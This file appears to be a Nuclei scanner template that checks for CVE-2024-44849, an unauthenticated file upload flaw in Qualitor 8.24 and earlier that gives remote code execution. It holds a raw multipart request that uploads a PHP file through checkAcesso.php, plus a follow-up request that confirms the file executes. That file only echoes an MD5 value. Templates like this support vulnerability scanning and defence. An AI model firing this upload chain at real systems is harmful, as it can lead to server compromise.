nuclei-templates/http/cves/2024/CVE-2024-44849.yaml

95 lines
3.1 KiB
YAML

id: CVE-2024-44849
info:
name: Qualitor <= 8.24 - Remote Code Execution
author: s4e-io
severity: critical
description: |
Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.
reference:
- https://cvefeed.io/vuln/detail/CVE-2024-44849
- https://nvd.nist.gov/vuln/detail/CVE-2024-44849
- https://github.com/extencil/CVE-2024-44849
- https://blog.extencil.me/information-security/cves/cve-2024-44849
- https://sploitus.com/exploit?id=D08D686E-7910-5E17-99CC-36407B9884B8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-44849
cwe-id: CWE-434
metadata:
verified: true
max-request: 2
vendor: qualitor
product: qualitor
fofa-query: "Qualitor"
tags: cve,cve2024,rce,file-upload,qualitor,intrusive
variables:
filename: "{{rand_base(12)}}"
num: "{{rand_int(1000, 9999)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849
-----------------------------QUALITORspaceCVEspace2024space44849
Content-Disposition: form-data; name="idtipo"
2
-----------------------------QUALITORspaceCVEspace2024space44849
Content-Disposition: form-data; name="nmfilestorage"
-----------------------------QUALITORspaceCVEspace2024space44849
Content-Disposition: form-data; name="nmdiretoriorede"
.
-----------------------------QUALITORspaceCVEspace2024space44849
Content-Disposition: form-data; name="nmbucket"
-----------------------------QUALITORspaceCVEspace2024space44849
Content-Disposition: form-data; name="nmaccesskey"
-----------------------------QUALITORspaceCVEspace2024space44849
Content-Disposition: form-data; name="nmkeyid"
-----------------------------QUALITORspaceCVEspace2024space44849
Content-Disposition: form-data; name="fleArquivo"; filename="{{filename}}.php"
<?php echo md5({{num}}); ?>
-----------------------------QUALITORspaceCVEspace2024space44849
Content-Disposition: form-data; name="cdfilestorage"
-----------------------------QUALITORspaceCVEspace2024space44849--
matchers:
- type: dsl
dsl:
- contains_all(body, "parent.showQAlert(\'Upload", "showQAlert")
- status_code == 200
condition: and
internal: true
- raw:
- |
GET /html/ad/adfilestorage/request/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"{{md5(num)}}")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100a9a274d0dc0fcf9d9cadbf11e17722d8273bef9062b706e031eb27319fcfb53b022100d9d40968b2d24451453a92bf17c0d40250a23caf9a94ac7fe7e68039ea79306a:922c64590222798bb761d5b6d8e72950